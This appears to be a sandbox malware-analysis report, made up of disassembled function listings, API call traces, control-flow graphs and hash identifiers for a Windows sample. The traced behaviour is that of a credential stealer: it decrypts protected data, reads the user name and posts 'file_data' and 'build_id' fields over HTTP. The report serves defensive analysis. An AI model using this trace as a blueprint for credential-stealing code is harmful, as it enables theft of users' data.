                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3466090806-0
                                                                                                                                                                                                                                                  • Opcode ID: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction ID: 11042f845f27c60c9cfe49634e62bc90fad70a14fa62364d3bf2c67db5fe234b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F04F75104254BFD310AB66EC4DD1BBFADFFC6B55F001429F98492160D6359C14DB71
                                                                                                                                                                                                                                                  Function 0040B006 Relevance: 4.5, APIs: 3, Instructions: 42memoryencryptionCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32 ref: 0040B03B
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040B057
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040B073
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                  • Opcode ID: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction ID: 231cd1f39a8479791712d5f3edf0a94c60cf588e50de6fedb89cc5dbc35e2890
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D90140755083029BD701EF64D845A1BFBE5FFC8754F008A2AF88493351E730D994CB92
                                                                                                                                                                                                                                                  Function 00413D91 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040129D,?,004315D8), ref: 00413D94
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,0040129D,?,004315D8), ref: 00413DA3
                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000), ref: 00413DB1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
                                                                                                                                                                                                                                                  • Opcode ID: 5d518cf6961e07d286ed60c3f8fb2455d35567b628f951d60df5cb2ce1d2a2c4
                                                                                                                                                                                                                                                  • Instruction ID: 9335b4869ff5d5de368b717405b7ae0b04054e65bb97385264346cc33f41d643
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d518cf6961e07d286ed60c3f8fb2455d35567b628f951d60df5cb2ce1d2a2c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4D06CB5B002606FD620AB6AAC0DE8B3A6CEB8AB65B850170F905D7250D6749846C6A9
                                                                                                                                                                                                                                                  Function 00407382 Relevance: 60.3, APIs: 27, Strings: 7, Instructions: 761networkstringmemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 0 407382-40745a call 41370e call 413740 call 406be0 call 414b70 call 41398e lstrlenA call 41398e call 414b70 call 41370e * 4 StrCmpCA 23 407489-4074c6 call 4148f3 call 413806 call 4137c0 call 413770 * 2 0->23 24 40745c-407483 call 41398e InternetOpenA 0->24 46 4074f2-407519 call 413860 call 413806 23->46 47 4074c8-4074eb 23->47 24->23 29 407cd0-407d10 call 4147f4 * 2 call 41395a * 4 call 413740 24->29 59 407d15-407d66 call 413770 * 9 29->59 57 407533-4075de call 413860 call 4137c0 call 413770 * 3 call 413860 call 413806 call 4137c0 call 413770 * 2 InternetConnectA 46->57 58 40751b-40752c 46->58 47->46 57->29 98 4075e4-40761c HttpOpenRequestA 57->98 58->57 99 407622-407624 98->99 100 407cc9-407cca InternetCloseHandle 98->100 101 407644-40764e 99->101 102 407626-40763e InternetSetOptionA 99->102 100->29 103 407650-40766a 101->103 104 407671-4076b8 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 101->104 102->101 103->104 117 4076d1-40772e call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 104->117 118 4076ba-4076ca 104->118 137 407730-407743 117->137 138 40774a-407817 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 117->138 118->117 137->138 181 407837-4079fb call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 4025a9 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 138->181 182 407819-407830 138->182 281 407a1d-407b29 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 41398e lstrlenA call 41398e lstrlenA GetProcessHeap RtlAllocateHeap call 41398e * 2 lstrlenA memcpy call 41398e lstrlenA memcpy call 41398e lstrlenA call 41398e * 2 lstrlenA memcpy 181->281 282 4079fd-407a16 181->282 182->181 311 407b2c-407b60 call 41398e lstrlenA call 41398e HttpSendRequestA 281->311 282->281 316 407b62-407b75 Sleep 311->316 317 407bbf-407bed call 4147f4 HttpQueryInfoA 311->317 319 407b77-407b7a 316->319 320 407b7c-407b8e call 4147f4 316->320 323 407bf3-407bfe call 4147cc 317->323 324 407d69-407d70 317->324 319->311 319->320 329 407b90-407ba3 320->329 330 407baa-407bba call 41370e 320->330 323->324 335 407c04-407c1f InternetReadFile 323->335 327 407d72-407d85 324->327 328 407d8c-407d99 call 41370e 324->328 327->328 328->59 329->330 330->59 337 407c21-407c26 335->337 338 407c75-407c8a call 41398e 335->338 337->338 340 407c28 337->340 343 407ca6-407cb3 StrCmpCA 338->343 344 407c8c-407c9f 338->344 342 407c2b-407c6c call 413860 call 4137c0 call 413770 InternetReadFile 340->342 342->338 353 407c6e-407c73 342->353 346 407cb5-407cb7 ExitProcess 343->346 347 407cbd-407cc6 InternetCloseHandle 343->347 344->343 347->100 353->338 353->342
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,004073EC,?,?,?,?,?), ref: 00414BA6
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: GetProcessHeap.KERNEL32(?,004073EC,?,?,?,?,?), ref: 00414BB9
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: RtlAllocateHeap.NTDLL(00000000,00000008,?,?,004073EC,?,?,?,?,?), ref: 00414BC3
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414BDA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004073FA
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,?,00000000,00000000), ref: 00407449
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 0040747C
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 004075D6
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00407611
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,FFFFFFFF,00000004), ref: 0040763E
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,?,?,00633851,?,?,?,?), ref: 00407A63
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407A79
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00407A92
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407AB1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,0041A9AE,00000000), ref: 00407AB8
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 00407AD1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000014), ref: 00407ADC
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407AF5
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B17
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B1C
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B45
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407B5B
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B69
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00407BE2
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00407C17
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00407C64
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407CAC
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00407CB7
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00407CC0
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00407CCA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackExitInfoOptionQuerySendSleep
                                                                                                                                                                                                                                                  • String ID: ------$"$--$------$block$build_id$file_data
                                                                                                                                                                                                                                                  • API String ID: 2371931802-3773912656
                                                                                                                                                                                                                                                  • Opcode ID: e6b27f7c5fb395c915c855a183409fb9bed813d943871a9821f556bd1914e2b2
                                                                                                                                                                                                                                                  • Instruction ID: 8ef9556bcb9b27fc7718986cd64f5425e1259ef4970f3e192c21128dbb4bf585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6b27f7c5fb395c915c855a183409fb9bed813d943871a9821f556bd1914e2b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 974295F4A001185BDB06BF628C56AFE7A6AAF81749F00542EF405672D2CF3C5F858BD9
                                                                                                                                                                                                                                                  Function 00407D9E Relevance: 60.2, APIs: 30, Strings: 4, Instructions: 686networkmemorystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 354 407d9e-407e3e call 413740 call 406be0 call 41370e * 5 call 41398e InternetOpenA StrCmpCA 371 407e44-407e84 call 4148f3 call 413806 call 4137c0 call 413770 * 2 354->371 372 4085a5-4085c6 InternetCloseHandle call 41398e call 40af38 354->372 399 407e86-407e96 371->399 400 407e9d-407ec3 call 413860 call 4137c0 call 413770 371->400 382 408613-408635 call 4147f4 * 2 call 413740 372->382 383 4085c8-408611 call 413778 call 413860 call 4137c0 call 413770 GetProcessHeap RtlFreeHeap 372->383 405 408638-408692 call 413770 * 10 382->405 383->382 399->400 418 407ec5-407edf 400->418 419 407ee6-407f21 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 400->419 418->419 445 407f23-407f33 419->445 446 407f3a-407fea call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 413806 call 4137c0 call 413770 * 2 InternetConnectA 419->446 445->446 446->372 470 407ff0-408028 HttpOpenRequestA 446->470 471 40859e-40859f InternetCloseHandle 470->471 472 40802e-408032 470->472 471->372 473 408034-408045 InternetSetOptionA 472->473 474 40804b-40805b 472->474 473->474 475 40805d-408077 474->475 476 40807e-4080bf call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 474->476 475->476 489 4080c1-4080d1 476->489 490 4080d8-408135 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 476->490 489->490 509 408151-40821b call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 490->509 510 408137-40814a 490->510 553 40823b-40831b call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 4025a9 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 509->553 554 40821d-408234 509->554 510->509 605 408335-4083c6 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 41398e lstrlenA call 41398e lstrlenA GetProcessHeap HeapAlloc 553->605 606 40831d-40832e 553->606 554->553 629 4084aa-4084d5 InternetCloseHandle * 3 605->629 630 4083cc-408432 call 41398e * 2 lstrlenA memcpy call 41398e lstrlenA call 41398e * 2 lstrlenA memcpy 605->630 606->605 631 4084f1-4084fb call 41370e 629->631 632 4084d7-4084ea 629->632 645 408434-408468 call 41398e lstrlenA call 41398e 630->645 631->405 632->631 651 408500-40851c call 4147f4 GetProcessHeap HeapFree 645->651 652 40846e-408481 Sleep 645->652 659 40851e-40853c InternetReadFile 651->659 653 408483-408486 652->653 654 408488-4084a8 call 4147f4 GetProcessHeap HeapFree 652->654 653->645 653->654 654->629 654->659 660 40858c-40859b InternetCloseHandle 659->660 661 40853e-408543 659->661 660->471 661->660 662 408545 661->662 663 408548-408583 call 413860 call 4137c0 call 413770 InternetReadFile 662->663 663->660 670 408585-40858a 663->670 670->660 670->663
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 00407E29
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,?), ref: 00407E36
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00407FDC
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040801D
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,?,?,00633851,?), ref: 00408396
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004083A9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004083B5
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 004083C2
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004083E7
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 004083EC
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 00408403
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 00408425
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 0040842A
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 0040844D
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 00408475
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 0040849A
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?), ref: 004084A4
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084AD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084B6
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084BF
